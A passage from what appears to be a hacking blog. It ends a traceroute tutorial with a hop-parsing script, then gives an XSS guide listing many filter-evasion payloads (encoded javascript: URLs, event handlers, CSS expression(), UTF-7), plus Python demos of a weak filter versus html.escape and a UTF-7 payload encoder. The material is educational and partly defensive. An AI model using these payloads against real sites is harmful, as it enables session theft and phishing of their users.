3. These first hops carry private IP addresses. They belong to your own router and to your ISP's internal network, and they are translated to a public address on the way out (network address translation, NAT). Private addresses are never assigned by the regional registries (RIPE, ARIN, APNIC, LACNIC, AfriNIC), which is why a whois lookup on them tells you nothing; the registries only record who holds public address blocks.
The private ranges (RFC 1918) are:
10.0.0.0 – 10.255.255.255,
172.16.0.0 – 172.31.255.255,
192.168.0.0 – 192.168.255.255
The range 224.0.0.0 – 239.255.255.255 is reserved for multicast, not for private networks, and will never appear as a hop in a trace.

4. Asterisks mean that hop could not be reached. More accurately, the probes did not make it there and back; they may actually be reaching the system, with the replies being lost on the return trip. That can be a genuine network problem, but it is more often an intentional block by a firewall or other security measure, and the block may affect traceroute without affecting real connections to the server.
5. If the firewall does not block the probes, the trace ends with the target's own address, like this.
Note: The hops just before the target identify the ISP (Internet service provider).

Now Understanding trace route for websites:
[Figure: trace route of a website (screenshot of tracert output for www.hackingloops.com)]
Since hackingloops is a blog hosted on Google, its name is an alias for ghs.l.google.com, so the first line shows that canonical name and the address it resolves to, 209.85.175.121. So our destination is 209.85.175.121.

Hops 1 to 4 show private addresses, as explained above: your local router and the NAT layer inside the ISP. Hops 5, 6 and 9 are also private addresses, belonging to networks along the path rather than to the destination.

Hops 7 and 8 are routers at your ISP; their names identify the provider. The trace above clearly shows that I am using the Tata Teleservices ISP.
Hops 10, 13, 14 and 15 are Google addresses, because this is a Google-hosted blog.
Hops 11 and 12 are further routers inside Google's network. The names printed beside them are reverse DNS entries for those routers, not DNS servers of hackingloops; traceroute only ever shows routers on the path.
Hop 16 is our destination.

That was the meaning of each line; now the whole process in one go.
First my system resolves the name hackingloops to its address, 209.85.175.121 (via the alias ghs.l.google.com). Since I did not give a hop count, the default maximum of 30 hops applies. The probes then leave through my local router (192.168.***.***), pass through my ISP's routers (Tata Teleservices), cross into Google's network (72.14.222.166 and 72.14.232.93) and finally reach the server that answers for hackingloops. Each router along the way sends back an ICMP time-exceeded reply as the packet's TTL runs out, and those replies are the lines of the trace. Traceroute never contacts IANA or the regional registries; if you want to know who owns an address that appeared in the trace, that is a separate whois lookup you do afterwards.
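The reading of a trace described above, as an added example that is not part of the original tutorial: a small Python parser for Windows tracert output that labels each hop the way the text does (private RFC 1918 address, public address, no reply) and summarises where the path leaves the local network, which hops stayed silent and whether the target itself answered. It parses text, it does not send probes. The sample output is constructed for this example (the Google addresses are the ones quoted in the article; the local, ISP and documentation-range hops are made up), not a real capture.

```python
import ipaddress
import re

# Constructed sample in the format Windows tracert prints.  Not a real
# capture: 72.14.222.166 and 209.85.175.121 are the article's Google
# addresses, the rest are made up (203.0.113.17 is a documentation address).
SAMPLE_TRACERT = """\
Tracing route to ghs.l.google.com [209.85.175.121]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    25 ms    24 ms    26 ms  10.5.0.1
  3     *        *        *     Request timed out.
  4    40 ms    41 ms    39 ms  203.0.113.17
  5    55 ms    54 ms    56 ms  72.14.222.166
  6    70 ms    69 ms    71 ms  ghs.l.google.com [209.85.175.121]

Trace complete.
"""

# The three RFC 1918 ranges the article lists.  224.0.0.0/4 is multicast,
# not private, and is reported separately.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

HEADER_RE = re.compile(r"^Tracing route to (?P<host>\S+) \[(?P<ip>[\d.]+)\]")
HOP_RE = re.compile(r"^\s*(?P<hop>\d+)\s+(?P<rtts>(?:(?:<?\d+ ms|\*)\s+){3})(?P<target>.+?)\s*$")
TARGET_RE = re.compile(r"^(?:(?P<host>\S+)\s+)?\[?(?P<ip>\d+\.\d+\.\d+\.\d+)\]?$")


def classify(ip_text):
    """Label an address the way the tutorial reads a hop."""
    if ip_text is None:
        return "no reply"
    ip = ipaddress.ip_address(ip_text)
    if any(ip in net for net in RFC1918):
        return "private"
    if ip.is_multicast:
        return "multicast"
    return "public"


def parse_tracert(text):
    """Return (destination_ip, hops).  Each hop is a dict with the hop
    number, three RTTs in ms (None where tracert printed '*'; '<1 ms' is
    recorded as 1), hostname, IP and the classify() label."""
    destination, hops = None, []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            destination = m.group("ip")
            continue
        m = HOP_RE.match(line)
        if not m:
            continue
        rtts = [None if tok == "*" else int(tok.lstrip("<"))
                for tok in re.findall(r"<?\d+(?= ms)|\*", m.group("rtts"))]
        host = ip = None
        t = TARGET_RE.match(m.group("target"))  # no match for "Request timed out."
        if t:
            host, ip = t.group("host"), t.group("ip")
        hops.append({"hop": int(m.group("hop")), "rtts": rtts,
                     "host": host, "ip": ip, "kind": classify(ip)})
    return destination, hops


def summarize(destination, hops):
    """Where the path leaves the private network, which hops dropped the
    probes, and whether the last replying hop is the destination itself."""
    def mean(hop):
        vals = [r for r in hop["rtts"] if r is not None]
        return sum(vals) / len(vals) if vals else None

    last_ip = next((h["ip"] for h in reversed(hops) if h["ip"]), None)
    return {
        "first_public_hop": next((h["hop"] for h in hops if h["kind"] == "public"), None),
        "silent_hops": [h["hop"] for h in hops if h["ip"] is None],
        "reached_destination": last_ip == destination,
        "mean_rtt_ms": {h["hop"]: mean(h) for h in hops},
    }


if __name__ == "__main__":
    dest, hops = parse_tracert(SAMPLE_TRACERT)
    for h in hops:
        print(f'{h["hop"]:2d}  {h["kind"]:9s}  {h["ip"] or "-":16s}  {h["host"] or ""}')
    print(summarize(dest, hops))
```

Run it against your own `tracert` output by replacing SAMPLE_TRACERT; a trace whose "reached_destination" is False but whose "first_public_hop" is set is exactly the firewalled case described above: the ISP is visible, the target is not.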

The Complete Guide to XSS

What is Cross Site Scripting?


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows malicious users to inject client-side code into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass the browser's same-origin protections. By finding clever ways of injecting malicious scripts into web pages an attacker can gain access to sensitive page content, session cookies, and a variety of other objects the browser would otherwise keep to the site.

There are three distinct types of XSS vulnerabilities:
non-persistent
persistent
and DOM-based (which can be either persistent or non-persistent).

A non-persistent cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that same user. A classic example is a site search engine: if one searches for a string which includes some HTML special characters, the search string is often redisplayed on the result page to show what was searched for, or at least placed in the text box for easier editing. If any occurrence of the search terms is not HTML entity encoded, an XSS hole results.

A persistent XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A persistent (type 2) XSS vulnerability exists when data provided to a web application by a user is first stored on the server (in a database, file system or other location), and later displayed to other users in a web page without being HTML entity encoded. A classic example is an online message board where users are allowed to post.

A DOM-based XSS vulnerability, also referred to as local cross-site scripting, is based on the standard object model for representing HTML or XML, the Document Object Model (DOM). With DOM-based cross-site scripting the problem exists within the page's own client-side script. For instance, if a piece of JavaScript reads a URL parameter and uses it to write some HTML into its own page without encoding it, an XSS hole is likely present, since the written data will be re-interpreted by the browser as HTML, which could include additional client-side scripts.

Finding XSS Vulnerabilities


The most commonly used XSS injection test is:

<script>alert("XSS")</script>

When this example is injected into an input box or a URL parameter, it will either fire or it will fail. If the injection fails, it doesn't mean the site is secure, it just means you need to look deeper.

XSS Filter Evasion



Escaping From Strings

The first step is to view the source of the web page and see if you can find the injected string in the HTML. There are several places you may find it completely intact yet hidden from the casual observer. The first is within an input parameter:

<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

In this example we could alter our input to include two characters that allow the injected code to jump out of the single quotes:

'><SCRIPT>alert("XSS")</SCRIPT>

Now our code renders because we have ended the attribute value and the HTML tag before our vector, which allows it to fire. However, in this case the extraneous single quote and closing angle bracket are displayed on the web page. This can be suppressed if we update our vector to the following:

'><SCRIPT>alert("XSS")</SCRIPT><xss a='

This turns the code output into:

<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

As a result, the JavaScript is injected with no visible indication of its existence. The <xss a=''> tag renders nothing, because it is not a known element.

Working Around Filtered Quotes

Let's use the same example, but assume the webmaster has added code that puts a backslash in front of every single or double quote (PHP's addslashes()). Our previous vector, without the trailing part, now turns into:

<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

The backslash means nothing to the HTML parser, so the single quote still ends the attribute and the <SCRIPT> tag is still parsed; what breaks is the JavaScript, because alert(\"XSS\") is a syntax error. There are several ways around this, depending on the filtering in place. One is to use character entities. Some characters are reserved in HTML; for example, you cannot use a literal less-than or greater-than sign in your text because the browser could mistake it for markup. If we want the browser to display such a character we insert a character entity into the HTML source instead:

&#34;   &quot;   "   quotation mark
&#38;   &amp;    &   ampersand
&#60;   &lt;     <   less-than sign
&#62;   &gt;     >   greater-than sign

Using &quot; or &#34; in place of our quotes is one way around quote filtering. Example:

<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&#34;XSS&#34;)</script>

One caveat: the browser decodes character references inside attribute values (an onerror handler, a src or href) but not inside the body of a <script> element, so the two entity forms above only run when the payload lands inside an attribute, such as onerror="alert(&quot;XSS&quot;)", and not between script tags.

If no quotes of any kind are allowed you can use fromCharCode in JavaScript to build any string you need. String.fromCharCode() takes a list of Unicode code points and returns the corresponding string. Example:

<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>

88, 83, 83 are the ASCII codes for X, S, S; any ASCII table gives you the values for other strings (the same numbers work with MySQL's char(...) when you need the trick in SQL).

Working Around <SCRIPT> Filtering

Some filters will filter out <script> making it impossible for any of the above examples to work. However, there are many other ways to insert JavaScript into a Web page. Let's look at an example of an event handler:

<BODY onload="alert('XSS')">

The "onload" keyword inside HTML represents an event handler. It does not work with all HTML tags, but it is particularly effective inside BODY tags. That said, there are instances where this approach will fail, such as when a BODY onload handler is already defined higher on the page before your vector shows up. Another useful example is the onerror handler:

<IMG SRC="" onerror="alert('XSS')">

Because the image source is empty and cannot load, the onerror event fires and the JavaScript inside it runs, all without ever using a <script> tag. Event handler attributes are the reason stripping <script> is never enough: the list of on* attributes is long, and every one of them is an execution point.

Using IMG SRC

The two most commonly permitted HTML tags are <A HREF, used for links, and <IMG, used to embed images. Of these two, the more dangerous is the IMG tag. The following illustrates why:

<IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon:

<IMG SRC=javascript:alert('XSS')>

With the quotes replaced by entities (for filters that strip quotes):

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Using fromCharCode to work around quote filtering:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

A simple attack vector like the one above can be obfuscated further by turning the entire string into decimal character references:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Using an ASCII table you can decode this example, and then use the same method to build your own injectable string. The same can be done in hexadecimal:

<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>

The browser decodes the references before it looks at the URL, so the attribute value is javascript:alert('XSS') either way; a filter that searches the raw input for the word "javascript" sees neither. Note that the javascript: URL scheme inside an image source has been deprecated since IE 7.0; it still works in IE 6.0, Opera 9.0 and Netscape 8.0 (in IE rendering engine mode, although it was deprecated there as of 8.1), and no current browser executes it at all, so the image vectors are mainly of historical interest.

Using Tab, New Line, and Carriage Return

Tab, new line and carriage return characters can also be used to trick XSS filters, because the browser strips them out of a URL scheme before deciding what kind of URL it is looking at.

<IMG SRC="jav&#x09;ascript:alert('XSS');">

The example above uses the hexadecimal reference for a tab to break up the word javascript, so a filter looking for that word never sees it. Write the reference with its semicolon: without it, &#x9a is read as the single character U+009A, because the parser consumes every hex digit that follows. Once the browser has decoded the reference, the attribute looks like this (where <TAB> stands for the tab character):

<IMG SRC="jav<TAB>ascript:alert('XSS');">

The same three characters in the other encodings the browser accepts:

                      Horizontal Tab   New line      Carriage Return
URL encoded           %09              %0A           %0D
Minimal hex           &#x9             &#xA          &#xD
Padded hex            &#x0000009;      &#x000000A;   &#x000000D;
Minimal decimal       &#9              &#10          &#13
Padded decimal        &#0000009;       &#0000010;    &#0000013;
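The filter-evasion sections above (breaking out of the attribute, quote filtering, stripped script tags, event handlers, and the entity and tab tricks in URLs), as an added example that is not code from the original guide: a hypothetical home-grown filter of the kind the guide defeats, beside the entity-encoding fix, with an HTML-parser check that reports what would actually execute. The page template, the naive filter and the ScriptSniffer checker are assumptions made for this demonstration; the payloads are the guide's own, wrapped so they first close the value='...' attribute. Python's HTMLParser decodes character references in attribute values the way a browser does, which is what makes the entity and tab variants visible to the check.

```python
import html
from html.parser import HTMLParser


def naive_filter(user_input):
    """Hypothetical 'protection': strip <script> tags (exact case only) and
    backslash-escape quotes, PHP addslashes() style."""
    for tag in ("<script>", "</script>", "<SCRIPT>", "</SCRIPT>"):
        user_input = user_input.replace(tag, "")
    return (user_input.replace("\\", "\\\\")
                      .replace("'", "\\'")
                      .replace('"', '\\"'))


def render_naive(user_input):
    """The guide's search box, with the weak filter applied."""
    return "<INPUT type=\"text\" value='" + naive_filter(user_input) + "'>"


def render_safe(user_input):
    """The fix: HTML entity encoding of & < > \" and ' for attribute context."""
    return "<INPUT type=\"text\" value='" + html.escape(user_input, quote=True) + "'>"


class ScriptSniffer(HTMLParser):
    """Records the three ways the guide reaches JavaScript: a <script>
    element, an on* event-handler attribute, or a javascript: URL in
    src/href.  Attribute values arrive with character references already
    decoded, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append("event handler " + name)
            elif name in ("src", "href") and value:
                # Browsers drop tab, LF and CR inside the scheme before
                # deciding what kind of URL they are looking at.
                scheme = "".join(c for c in value if c not in "\t\n\r").lstrip().lower()
                if scheme.startswith("javascript:"):
                    self.findings.append("javascript: URL in " + name)


def executable_parts(markup):
    """Return the executable constructs found in a fragment of HTML."""
    sniffer = ScriptSniffer()
    sniffer.feed(markup)
    sniffer.close()
    return sniffer.findings


# Vectors from the guide, each starting with '> to leave value='...'.
PAYLOADS = {
    "textbook":      "'><SCRIPT>alert(\"XSS\")</SCRIPT><xss a='",
    "mixed case":    "'><ScRiPt>alert(String.fromCharCode(88,83,83))</ScRiPt><xss a='",
    "event handler": "'><IMG SRC=x onerror=alert(1)><xss a='",
    "tab in scheme": "'><A HREF=jav&#x09;ascript:alert(1)>x</A><xss a='",
    "entity scheme": "'><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)><xss a='",
}


def compare_filters():
    """For each payload: what executes after the naive filter, and after
    html.escape().  The naive filter only stops the textbook vector."""
    return {name: (executable_parts(render_naive(p)), executable_parts(render_safe(p)))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (weak, safe) in compare_filters().items():
        print(f"{name:14s} naive filter: {weak or 'nothing'};  html.escape: {safe or 'nothing'}")
```

The backslashes the naive filter adds never stop the HTML parser, only the exact-case <script> strip does anything, and the remaining four vectors all run. With html.escape() every character that could end the attribute or start a tag becomes an entity, so the parser sees one INPUT element and nothing executable regardless of the vector.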


Using Null character

Another character that can cause problems for filters is the null character (NUL, %00 in a URL). It is one of the more obscure tools in the XSS arsenal. Take this example URL parameter, which can lead to a valid injection:

<SCR%00IPT>alert("XSS")</SCR%00IPT>

The null byte between SCR and IPT stops a filter from recognising the <SCRIPT> tag, while the browser ignores the byte and runs the tag anyway. This only works in IE 6.0, IE 7.0 and Netscape 8.0 in IE rendering engine mode.

Not filtering inside encapsulating pairs

This bypasses filtering that looks for matching opening and closing quotes inside HTML tags and ignores whatever is between them. Example:

<IMG """><SCRIPT>alert('XSS')</SCRIPT>">

Technically, inside the IMG tag the first two quotes should be read as an empty quoted value and do nothing. The next quote should open another quoted value that runs to the quote after the </SCRIPT> tag, and the whole thing should then be closed by the trailing angle bracket. But all major browsers (IE, Firefox, Netscape, Opera) treat this as malformed HTML and attempt to fix it. The output then looks like:

<img><script>alert('xss')</script>"&gt;


CSS Filter Evasion

HTML is a useful tool for injecting JavaScript, but it is not the only one: an even more complex sub-language of HTML is the style sheet, or CSS. There are many ways to inject into style sheets, and even more ways to use them to inject JavaScript. The simplest is a javascript: URL in a style sheet link tag:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

IE deprecated this as of 7.0 and it no longer works there, but you can still get it working in Opera and for users who still have IE 6.0 installed. Another way is the <STYLE> tag. It is rare that users are allowed to modify styles, but it does happen, most commonly on forums where users control the layout and design of their posts. The following works in IE and in Netscape in IE rendering engine mode:

<STYLE> a { width: expression(alert('XSS')) } </STYLE> <A>

As the example shows, IE's expression() extension lets the attacker run JavaScript without a javascript: URL or a <SCRIPT> tag. The same works inline:

<DIV STYLE="width: expression(alert('XSS'));">

expression() was an IE-only feature and was dropped in IE 8 standards mode, so this vector too is history in current browsers.


Obscure Filters

Let's take an example where a developer has taken user input and ensured that it contains no quotes, no angle brackets and no javascript: URLs. It is still not safe, because we can inject a data: URL. Here we have base64-encoded the simple string <script>alert('XSS')</script>:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

A data: URL lets us carry an entire document inside a single string. It works inside Firefox, Netscape in Gecko rendering engine mode and Opera; modern browsers have since blocked top-level navigation to data: URLs for exactly this reason.

Using Double Quotes

If you need to use both double and single quotes you can use a grave accent (backtick) to delimit the attribute value. This is also useful because many cross-site scripting filters do not know about grave accents. Only IE ever treated backticks as attribute quotes, so this is IE-specific.

<IMG SRC=`javascript:alert("Look its, 'XSS'")`>


Escaping characters

Escaping quotes yourself is sometimes useful against a home-written XSS filter: your backslashes consume the backslashes the filter adds.
This ONLY works against a weak, home-written filter that escapes backslashes but leaves an already-escaped quote alone; PHP's addslashes() escapes both and turns \" into \\\", which does not help.

<IMG SRC=`javascript:alert(\"XSS\")`>

The result would be:

<IMG SRC=`javascript:alert(\\"XSS\\")`>

As you can see, your own escape characters have swallowed the escape characters the XSS protection inserted, and the quote is back in play.

Encoding

It is often assumed that if all angle brackets and quotes have been filtered, XSS is no longer possible. XSS, however, depends on the browser: as long as the browser understands other character encodings, you can run into situations where it executes code without any of those characters ever appearing in the input the filter saw.
A real-world example of an encoding-based XSS was found in the Google Search Appliance by a hacker named Maluc. A normal Google Search Appliance query looked like:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&proxystylesheet=stanford&site=stanfordit&oe=UTF-8&q=hi

He noticed that the oe parameter (oe=UTF-8) selects the output encoding of the page, and that he could change it from UTF-8 to UTF-7.
UTF-7 (7-bit Unicode Transformation Format) is a variable-length character encoding that was proposed for representing Unicode text as a stream of ASCII characters, for example in Internet e-mail messages. UTF-7 is generally not used as a native representation within applications, as it is very awkward to process despite its size advantage over the combination of UTF-8 with either quoted-printable or base64.
Lets take for example:


<script>alert("XSS")</script>

And encode it using UTF-7 (< becomes +ADw-, > becomes +AD4- and " becomes +ACI-):

+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-

In a GET query string a literal + is decoded as a space, so every + has to be URL-encoded as %2B. Maluc's actual payload used alert(1) rather than alert("XSS"), with the parentheses URL-encoded as well, giving:

%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-

URL encoding turns a string into a safe block of text for the query string of a URL. To encode a character you write a percent sign followed by the two-digit hexadecimal value of that character. For example:

Original character      URL encoded
space                   %20
/ (forward slash)       %2F
" (double quote)        %22
? (question mark)       %3F
+ (plus)                %2B

With this Maluc came up with:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&proxystylesheet=stanford&site=stanfordit&oe=UTF-7&q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x

and was able to execute his script: the appliance echoed the query back into a page it now declared as UTF-7, so the browser decoded +ADw-script+AD4- into a real <script> tag even though the filter never saw an angle bracket.
Of course the effect of this reflected XSS is only temporary and only affects users who visit that URL, but it could easily provide an avenue for phishing. In this way the Google appliance weakened Stanford University's security by being placed on the same domain as the university's own pages.
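The UTF-7 trick described above, as an added example that is not code from the original guide or from Maluc's report: a Python routine that produces the UTF-7 form of a payload, URL-encodes it for a query string the way the article's URL does, and then shows why a byte-level filter misses it while a page declared as UTF-7 decodes it into a live script tag. The encoder, the toy filter and the sample strings are assumptions made for this demonstration; the encoder base64-encodes every character outside UTF-7's Set D, which is what an attacker wants (no angle bracket or quote survives in the bytes), and the decoding side uses Python's own utf-7 codec.

```python
import base64
import urllib.parse

# UTF-7 "Set D" plus space: characters written as themselves.  Everything
# else, including < > " from the optional Set O, is base64-encoded here.
DIRECT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:? ")


def utf7_encode(text):
    """Encode text as UTF-7: runs of non-direct characters become
    '+' + base64(UTF-16BE) without padding + '-'."""
    out, run = [], []

    def flush():
        if run:
            raw = "".join(run).encode("utf-16-be")
            out.append("+" + base64.b64encode(raw).decode("ascii").rstrip("=") + "-")
            run.clear()

    for ch in text:
        if ch == "+":            # a literal plus is written "+-"
            flush()
            out.append("+-")
        elif ch in DIRECT:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out)


def as_query_value(encoded):
    """'+' in a query string means space, so it must become %2B; '/' is
    left alone as in the article's URL."""
    return urllib.parse.quote(encoded, safe="/")


def naive_filter_blocks(raw_bytes):
    """Toy server-side filter: looks for a script tag in the raw bytes."""
    return b"<script" in raw_bytes.lower()


def browser_sees(raw_bytes, charset):
    """What the browser renders once the page declares `charset`."""
    return raw_bytes.decode(charset)


def demo(payload='<script>alert(1)</script>'):
    """Trace one payload from URL to rendered page under both charsets."""
    q = as_query_value(utf7_encode(payload))           # what goes in the URL
    echoed = urllib.parse.unquote(q).encode("ascii")   # what the server echoes back
    return {
        "query_value": q,
        "filter_blocked": naive_filter_blocks(echoed),
        "as_utf8": browser_sees(echoed, "utf-8"),
        "as_utf7": browser_sees(echoed, "utf-7"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:15s} {value!r}")
```

The server-side lesson is the one the Stanford case teaches: filter and encode in the same character set you will tell the browser to use, never let a request parameter choose the output charset, and send an explicit UTF-8 Content-Type so the browser has no reason to guess.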
Written by Override and Killordie

References
RSnake, XSS (Cross Site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html [viewed 07/25/2009].
OWASP, XSS (Cross Site Scripting) Prevention Cheat Sheet, http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet [viewed 07/25/2009].
Xylitol (2008), Cross Site Scripting - Attack and Defense guide, http://milw0rm.com/papers/192 [viewed 07/25/2009].
Langy, XSS Guide - 1st Part, http://www.googlebig.com/forum/-en-xss-guide-1st-part-t-157.html [viewed 07/25/2009].
